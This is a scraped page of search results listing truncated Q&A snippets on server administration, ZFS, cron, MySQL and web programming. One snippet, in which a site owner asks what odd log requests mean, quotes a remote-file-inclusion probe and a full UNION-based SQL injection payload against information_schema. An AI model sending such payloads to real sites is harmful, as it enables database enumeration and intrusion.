Search Results

Search found 3070 results on 123 pages for 'cron jobs'.

Page 99/123 | < Previous Page | 95 96 97 98 99 100 101 102 103 104 105 106  | Next Page >

  • What Logs / Process Stats to monitor on a Ubuntu FTP server?

    - by Adam Salkin
    I am administering a server with Ubuntu Server which is running pureFTP. So far all is well, but I would like to know what I should be monitoring so that I can spot any potential stability and security issues. I'm not looking for sophisticated software, more an idea of what logs and process statistics are most useful for checking on the health of the system. I'm thinking that I can look at various parameters output from the "ps" command and compare to see if I have things like memory leaks. But I would like to know what experienced admins do. Also, how do I do a disk check so that when I reboot, I don't get a message saying something like "disk not checked for x days, forcing check" which delays the reboot? I assume there is command that I can run as a cron job late at night. How often should it be run? What things should I be looking at to spot intrusion attempts? The only shell access is SSH on a non-standard port through UFW firewall, and I regularly do a grep on auth.log for "Fail" or "Invalid". Is there anything else I should look at? I was logging the firewall (UFW) but I have very few open ports (FTP and SSH on a non standard port) so looking at lists of IP's that have been blocked did not seem useful. Many thanks

    Read the article

  • Cannot destroy ZFS snapshot: dataset already exists

    - by Morven
    I have a server (T5220, though I doubt it matters) running Solaris 10 8/07 and I have a ZFS pool, "mysql", on internal disk. Within it I have a filesystem "mysql/data/4.1.12", which I snapshot hourly with a script from cron. I have one snapshot, created as one of those hourly snaps, that will not destroy. I have renamed it out of sequence to be "mysql/data/4.1.12@wibble" so that my script will not try and fail to destroy it, but it was originally within the sequence, though I doubt that matters. It renames successfully. The snapshot can be successfully navigated and read from through the .zfs/snapshots directory. It has no clones based on it. Trying to destroy it does this: (265) root@web-mysql4:/# zfs destroy mysql/data/4.1.12@wibble cannot destroy 'mysql/data/4.1.12@wibble': dataset already exists (266) root@web-mysql4:/# which is apparently nonsensical: of course it already exists, that's the point! Anyone seen anything like this before? Web searches show nothing obviously similar. I can provide patches installed if necessary.

    Read the article

  • What is the benefits and drawbacks of using header files?

    - by vodkhang
    I had some experience on programming languages like Java, C#, Scala as well as some lower level programming language like C, C++, Objective - C. My observation is that low level languages separate out header files and implementation files while other higher level programming language never separate it out. They use some identifiers like public, private, protected to do the jobs of header files. I saw one benefit of using header file (in some book like Code Complete), they talk about that using header files, people can never look at our implementation file and it helps with encapsulation. A drawback is that it creates too many files for me. Sometimes, it looks like verbose. It is just my thought and I don't know if there are any other benefits and drawbacks that people ever see and work with header file This question may not relate directly to programming but I think that if I can understand better about programming to interface, design software.

    Read the article

  • Why are all of my ZFS snapshot directories empty?

    - by growse
    I'm running an Oracle 11 box as a ZFS storage appliance, and I'm taking regular snapshots of the ZFS filesystems, via cron. In the past, I know that if I wanted to grab a particular file from a snapshot, a read-only copy was kept in .zfs/snapshot/{name}/ and I could just navigate there and pull the file out. This is documented on Oracle's website. However, I went to do this the other day, and noticed that the ZFS directories within the snapshot directories are all empty. zfs list -t snapshot correctly shows the list of snapshots that should be present, and .zfs/snapshots correctly contains a directory for each snapshot, and in each snapshot there is a directory present for each ZFS filesystem. However, these directories appear to be empty. I just tested a restore by touching a file in a little-used share and rolling back to the latest hourly snapshot, and this appears to have worked fine. So the rollback functionality is there. Did Oracle change how snapshots are done? Or is something seriously wrong here?

    Read the article

  • visually documenting web server configuration and infrastructure

    - by Alex Ciarlillo
    I have just finished a large re-organization and update of our institutions web server(s). This server hosts 3 virtual hosts, 3-4 blogs, 2 wikis, some legacy static HTML pages, and many hosted documents (PDF, .jpg, .xls). I have organized the site into a structure of something like: /var/www/sites/vhost1, vhost2, vhost3 .../wordpress/blogX .../mediawiki/wikiX Data is in a seperate directory structure so I can run a cron task over it to make sure it is all writeable and such. I then symlink to these data directories for each application. /var/www/data/vhost1, vhost2, vhost3 .../wordpress/blogX/uploads .../mediawiki/wikiX/images All Apache configs are in /etc/httpd/conf.d/vhosts.d/vhost1,2,3.conf On top of this there is also a testing server which mirrors this setup. Once changes are fully tested, they are rsynced down to the live server. All the wordpress installs and mediawiki installs are straight form SVN and updates are done by switching branches or "svn up". So my question is how can I best document to share with a) co-workers, b) possible future replacement, c) myself 6 months from now. Obviously I can make a wiki page, excel document, whatever and fill it with text, but I am looking for a more visual representation that I can use to explain the architecture to less-technical people. Ideally it would be awesome if this visual representation could then be expanded to get more technical details.

    Read the article

  • Log4net rollingfile appender skipping every other day in asp.net mvc app

    - by tasty_spider_men
    Hi, I've set up some log4net logging on an asp.net mvc application i've had running for a little over a month now. I've set up rolling file (and smtp) appender on it. The application is hit several thousand times a day - alot of actions are logged. On top of these a number of batch jobs are run as part of the application that also write to the log. Now - as i've been occupied with other work, i've not attended to this application much assuming things to be working based on my test setup. Unfortunately i discover that the rolling file appender on my production server seems to be skipping every other day. Ie i have logs : 10/4/2010, 10/4/2010.1, 10/4/2010.2, 12/4/2010, 12/4/2010.1 , 14/4/2010, 14/4/2010.1 etc. Any idea what could be causing this? It is absolutely impossible that there has no action on these odd days for the lifetime of the application. Cheers

    Read the article

  • What's the difference between /123 and /?123?

    - by BoltClock
    I've noticed that some sites (including http://jobs.stackoverflow.com) have query strings that look like this: http://somewebapp.example/?123 as compared to: http://somewebapp.example/123 or http://somewebapp.example/id/123 What are the reasons that developers choose to implement their web apps' URLs using the first example instead of the second and third examples? And as a bonus, how would one implement the first example in PHP, given that 123 is the primary key of some row in a database table? (I just need to know how to retrieve 123 from the URL; I already know how to query the database for a primary key of 123.)

    Read the article

  • Solution for distributing MANY simple network tasks?

    - by EmpireJones
    I would like to create some sort of a distributed setup for running a ton of small/simple REST web queries in a production environment. For each 5-10 related queries which are executed from a node, I will generate a very small amount of derived data, which will need to be stored in a standard relational database (such as PostgreSQL). What platforms are built for this type of problem set? The nature, data sizes, and quantities seem to contradict the mindset of Hadoop. There are also more grid based architectures such as Condor and Sun Grid Engine, which I have seen mentioned. I'm not sure if these platforms have any recovery from errors though (checking if a job succeeds). What I would really like is a FIFO type queue that I could add jobs to, with the end result of my database getting updated. Any suggestions on the best tool for the job?

    Read the article

  • What's the safest way to kick off a root-level process via cgi on an Apache server?

    - by MartyMacGyver
    The problem: I have a script that runs periodically via a cron job as root, but I want to give people a way to kick it off asynchronously too, via a webpage. (The script will be written to ensure it doesn't run overlapping instances or such.) I don't need the users to log in or have an account, they simply click a button and if the script is ready to be run it'll run. The users may select arguments for the script (heavily filtered as inputs) but for simplicity we'll say they just have the button to choose to press. As a simple test, I've created a Python script in cgi-bin. chown-ing it to root:root and then applying "chmod ug+" to it didn't have the desired results: it still thinks it has the effective group of the web server account... from what I can tell this isn't allowed. I read that wrapping it with a compiled cgi program would do the job, so I created a C wrapper that calls my script (its permissions restored to normal) and gave the executable the root permissions and setuid bit. That worked... the script ran as if root ran it. My main question is, is this normal (the need for the binary wrapper to get the job done) and is this the secure way to do this? It's not world-facing but still, I'd like to learn best practices. More broadly, I often wonder why a compiled binary is more "trusted" than a script in practice? I'd think you'd trust a file that was human-readable over a cryptic binaryy. If an attacker can edit a file then you're already in trouble, more so if it's one you can't easily examine. In short, I'd expect it to be the other way 'round on that basis. Your thoughts?

    Read the article

  • passing an extra parameter in jobschedule in node.js

    - by Sush
    Is there any possible way to pass any extra parameter instead of date in schedule.scheduleJob(date,function(id)) The below code is not working var id =record.id; var date =record.date; jobsCollection.save({ id: record.id }, { $set: record }, function (err, result) { var j = schedule.scheduleJob(date, function (id) { return function () { console.log("inside----------") console.log(id) }; }(id)); if (!err) { return context.sendJson([], 404);; } }); i want to pass the date along with another data to schedule jobs. so that i can perform other operations based on the date schedule and that id

    Read the article

  • What is the best to format messages for queueing?

    - by Tijmen
    I've been reading up on message queueing lately, and I'd like to implement a simple, extendable, system for my app. While there's a lot of good information on the subject of setting up a MQ system out there, I can't find a lot about the actual implementation. I'm looking for patterns and best practices on how to properly format messages for a queue, and ways to execute the jobs in PHP. Should I use JSON, serialized objects, text, URLs or XML? What information should I send? Is a worker with a switch($job['command']) {} (or something like that) the way to go, or are there any established patterns out there to implement a worker? Help greatly appreciated!

    Read the article

  • ec2 spot instance for daily processing task

    - by chaft
    I don't have much experience as a sysadmin or with amazon aws, so I hope someone can explain in simple terms or refer me to a good guide on how to achieve the below. I have a system running on ec2 and amazon rds getting data in and saving it to the db. I need to run a script once a day (at the end of the day) to process all that data and prepare a daily report. This process will take approximately an hour to run. It needs to run on a high memory instance.. From what i've read so far, I guess the best way to do it is to have a high memory spot instance run every day, set it up to execute the script on startup and and shut down when done. Is that the right way to do it? If so, how to do it? how to tell the spot instance to run every day? through a cron job on the other server or is there a better way? How to set it up to run the script on startup? through cloudinit? Any help would be appreciated. One last thing, the job is not very time sensitive as long as it runs every day.. thanks

    Read the article

  • How to deploy new instances of the same application (on 1 server) automatically?

    - by Intru
    I'm working on a SaaS application where each customer runs its own version of the application. All the application instances currently run on a single server. This works quite well for us (we need less resources in total). The application doesn't use a lot of resources, so even a small VPS would be overkill (and more expensive). Adding a new customer is currently quite a bit of work: Create a user that is allowed to ssh Create a new MySQL database and user Create a virtual host for the application Log in with the new user, do a git checkout of the application (in the right location) Create tables in the new database, and add some init data Add some cron jobs Create a first user that can log in Add this new instance to capistrano What would be the best way to automate these tasks? Are the applications that can (given proper configuration) do this? Ideally this should be usable for a sales-person (so something web-based). I could write a (bash) script that does most of these tasks, and then maybe add a small web-based wrapper where someone could provider the domain/default user information. Of course, this would also require a delete-script, since some customers will eventually leave, which means that you need a list of all existing customers/instances.

    Read the article

  • Write Local File using Adobe Air Iframe

    - by user290687
    This is driving me mad. I am creating an AIR application and everything is working great. However I would really like to have a form inside an Iframe that when the user clicks submit saves the file to local application storage directory. Right now I am able to do this and save the file with no problems when I just access the HTML page not inside an Iframe. However if I wrap the page in an iframe and hit submit the file does not save. Any code examples would be very much appreciated. When I am using the iframe my code looks as follows<iframe src="jobs/newjob.html" height="800px" width="800px" sandboxRoot="app:/" documentRoot="app:/sandbox"ondominitialize="setupBridge ()">

    Read the article

  • Reading log files from web application

    - by Egorinsk
    Hi! I want to write a small PHP application for monitoring logs on a Debian server, including syslog logs and Apache/PHP messages. The problem here is that Apache user (www-data) has no access to /var/log directory. What would be the best way to grant an access to logs for PHP application? Let's assume that log files can be really large, like hundreds of megabytes. I have some ideas: Write a shell script that would be run via sudo and tail last 512 Kb of log into a separate file that can be read by application - that's ineffective, because of forking a new process and having to read data twice Add www-data to adm group (that can read logs) - that's insecure Start a PHP process via cron every minute to read logs — that's not very good, because it doesn't allow real-time monitoring. Also, this script will be started even when I don't read logs, and consume CPU time (server is in the cloud, and I'll have to pay for it) Create a hardlink for all log files with lowered permissions - I guess, that won't work because logrotate could recreate log files and they'll change inode number. Start a separate nginx/Apache server under privileged user that may read logs. Maybe anyone got a better solution?

    Read the article

  • How to find the reason for a weekly downtime on an Ubuntu web server hosted by AWS?

    - by IceSheep
    We started monitoring our web server using Pingdom and found out that we have a downtime of a few minutes every Sunday at 0:00 UTC. The test runs every minute and checks if a successful HTTP response (code 200) is returned on port 80. The test fails due to a timeout (no response after 30 seconds). Here's what we've already checked – without success: Since we run our webserver behind a load balancer, I've set the Pingdom test on the load balancer's public DNS and the webserver's public DNS in order to find out if there's a problem with the AWS load balancer – both tests return the same result We set up Munin on our webserver. Everything looked fine even after the failure. Since the last failure lasted only 2 minutes I suppose Munin couldn't capture a potential problem (it only checks every 5 minutes) I have checked /var/log/apache2/error.log and /var/log/syslog for suspicious entries I have checked /etc/cron.weekly and /etc/crontab for suspicious entries I have searched for files created or last-modified during 0:00 and 0:15 using this method: touch -t 201209020000 start touch -t 201209020015 end find / -newer start -and ! -newer end (nothing found) Has anybody experienced a similar problem? Any proposals on how to find the reason for this behavior? It's Ubuntu 10.04 LTS running on an AWS m1.large instance. Thanks!

    Read the article

  • Why is "start in" needed for Windows scheduled tasks?

    - by GomoX
    We develop a web application that can be deployed on Windows or Linux. The Linux implementation uses cron, and the Windows one uses scheduled tasks to run a single PHP script that processes all scheduled tasks for our system. The task is scheduled using schtasks during the install process, like: This has always worked both under W2003 and W2008. A week ago a customer reported that scheduled tasks were not running. He is running on Windows 2008. We checked over and over and finally solved the issue by entering the folder that contains the .vbs script as the "start in" folder for the scheduled task. This said, there is no way to set up the "start in..." value from schtasks without using an XML definition of the tasks. XML definitions don't work in Windows 2003, so I would have to add windows version detection to the installer, additional testing, etc (I'd like to avoid this if at all possible). The only atypical thing I noticed about the install is that the system is installed in D:\ as opposed to the default C:\Program Files (x86)\, but I don't see how this would matter. All the paths are absolute in all the scripts. Can anyone suggest a reasonable solution for this?

    Read the article

  • cause for mysql crash

    - by user1322092
    A cron job automatically restarted my mysql database. What's the cause for the crash, or can you suggest how to resolve or monitor. I would REALLY appreciate your input. 120715 14:38:58 mysqld started 120715 14:38:58 InnoDB: Started; log sequence number 0 411137570 120715 14:38:58 [Note] /usr/libexec/mysqld: ready for connections. Version: '5.0.95' socket: '/var/lib/mysql/mysql.sock' port: 3306 Source distribution 120715 15:14:21 [Note] /usr/libexec/mysqld: Normal shutdown 120715 15:14:23 InnoDB: Starting shutdown... 120715 15:14:25 InnoDB: Shutdown completed; log sequence number 0 411166467 120715 15:14:25 [Note] /usr/libexec/mysqld: Shutdown complete 120715 08:14:25 mysqld ended 120715 08:14:26 mysqld started 120715 8:14:26 InnoDB: Started; log sequence number 0 411166467 120715 8:14:26 [Note] /usr/libexec/mysqld: ready for connections. Version: '5.0.95' socket: '/var/lib/mysql/mysql.sock' port: 3306 Source distribution 121212 09:15:32 mysqld started InnoDB: The log sequence number in ibdata files does not match InnoDB: the log sequence number in the ib_logfiles! 121212 9:15:58 InnoDB: Database was not shut down normally! InnoDB: Starting crash recovery. InnoDB: Reading tablespace information from the .ibd files... InnoDB: Restoring possible half-written data pages from the doublewrite InnoDB: buffer... 121212 9:17:28 InnoDB: Started; log sequence number 0 554145193 121212 9:17:57 [Note] /usr/libexec/mysqld: ready for connections. Version: '5.0.95' socket: '/var/lib/mysql/mysql.sock' port: 3306 Source distribution

    Read the article

  • How to efficiently implement a blocking call with Rails, while letting the client wait for the reply

    - by Kyle Heironimus
    We have a web service written in Rails. The API is published and we cannot change it. Our app communicates with a remote web service that sometimes hangs or takes several seconds to reply. Client -> Our Web Service -> Remote Web Service Currently, if the remote web service hangs for 5 seconds, one of our rails processes on our web service also hangs with it, which is what we need to avoid. I've seen things such as mod-x-sendfile, modporter, and delayed jobs, but the best I can tell, they all assume the client is not waiting for an answer. Since the API is already established, we cannot tell the client "I'm attempting to do what you want, check back later for the answer." The best option we have come up with so far is to add a second, non-rails web server running eventmachine to process these particular calls. Is there a better way?

    Read the article

  • Use of mouselisteners in a jTable

    - by eli1987
    I have a jTable with columns 'Job_no' and 'Status'with values such as: Job_no Status 1 Active 2 Pending 3 Pending I would like it so that if a user clicks on a Status say in this case the first 'Pending'(where Job_no = 2) an inputDialog pops up allowing the user to change the status of the cell clicked-how can I do this? Bear in mind you will also have to retrieve the Job_no(that corresponds to that status) somehow, and that, though I'm OK with JOptionPane's, I'm new to JTables. I'm using JDBC(mySQL) and have a table 'Jobs' which amongst other things, has column Job_no and status. Thanks for your help.

    Read the article

  • Is this an injection attempt or a normal request?

    - by CheeseConQueso
    In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example: /?x=19&y=15 The numbers are random, but its always setting x and y variables. Another category of mysterious requests: /?id=http://nic.bupt.edu.cn/media/j1.txt?? There are other attempts at injections in the request log that have straight sql written into them as well. Example: /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13-- It looks like they are all reaching a 404, but I'm still wondering about the intent behind these. I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason. Any suggestions as to what all these are?

    Read the article

  • C/C++ memory usage API in Linux/Windows

    - by minjang
    I'd like to obtain memory usage information for both per process and system wide. In Windows, it's pretty easy. GetProcessMemoryInfo and GlobalMemoryStatusEx do these jobs greatly and very easily. For example, GetProcessMemoryInfo gives "PeakWorkingSetSize" of the given process. GlobalMemoryStatusEx returns system wide available memory. However, I need to do it on Linux. I'm trying to find Linux system APIs that are equivalent GetProcessMemoryInfo and GlobalMemoryStatusEx. I found 'getrusage'. However, max 'ru_maxrss' (resident set size) in struct rusage is just zero, which is not implemented. Also, I have no idea to get system-wide free memory. Current workaround for it, I'm using "system("ps -p %my_pid -o vsz,rsz");". Manually logging to the file. But, it's dirty and not convenient to process the data. I'd like to know some fancy Linux APIs for this purpose.

    Read the article

  • what do i need to do now that I want to take programming hobby to next level ?

    - by hohog
    i've always wanted to make games but did not start actively learning programming by myself until 1st year of university. i kept going throughout university learning new languages, showing off things i had made, while neglecting my major in Biology. Anyways, i've ended up with an Economics degree, with a portfolio of SaaS and web apps i had created so i could eat during my final year. So far, I'm getting a few interviews here and there in web programming positions. When I get a logic pretest, I fail miserably. or job requires comp sci degree. I mean I can easily design and code an entire app which I emphasize through my portfolio.... but i dont know why I am so slow at logic puzzles on prescreening interview... So what should I do now ? get certificates in languages ? go back to school and learn CS ? is it too late to get into windows programming jobs than web programming ?

    Read the article

  • Windows batch/script code to conditionally process based on date value in text file

    - by CarolinaJay65
    I am using Windows XP. The code can be used in a batch file or vbs script. I intend to use Windows scheduler to run the program. I need code to read a date from a text file (could be the only line in the text file or the date could be included in the filename, I control the process that generates the file) The code would then need to evaluate the text file date against the current date to confirm that the text file date is from the prior month. I'm starting to build a process to be able to run 1st-of-the-month jobs once the monthly data has been refreshed. I'm new to building this kind of process using batch/script files. Thanks for your time

    Read the article

  • SQL Server (TSQL) - Is it possible to EXEC statements in parallel?

    - by Investor5555
    SQL Server 2008 R2 Here is a simplified example: EXECUTE sp_executesql N'PRINT ''1st '' + convert(varchar, getdate(), 126) WAITFOR DELAY ''000:00:10''' EXECUTE sp_executesql N'PRINT ''2nd '' + convert(varchar, getdate(), 126)' The first statement will print the date and delay 10 seconds before proceeding. The second statement should print immediately. The way T-SQL works, the 2nd statement won't be evaluated until the first completes. If I copy and paste it to a new query window, it will execute immediately. The issue is that I have other, more complex things going on, with variables that need to be passed to both procedures. What I am trying to do is: Get a record Lock it for a period of time while it is locked, execute some other statements against this record and the table itself Perhaps there is a way to dynamically create a couple of jobs? Anyway, I am looking for a simple way to do this without having to manually PRINT statements and copy/paste to another session. Is there a way to EXEC without wait / in parallel?

    Read the article

< Previous Page | 95 96 97 98 99 100 101 102 103 104 105 106  | Next Page >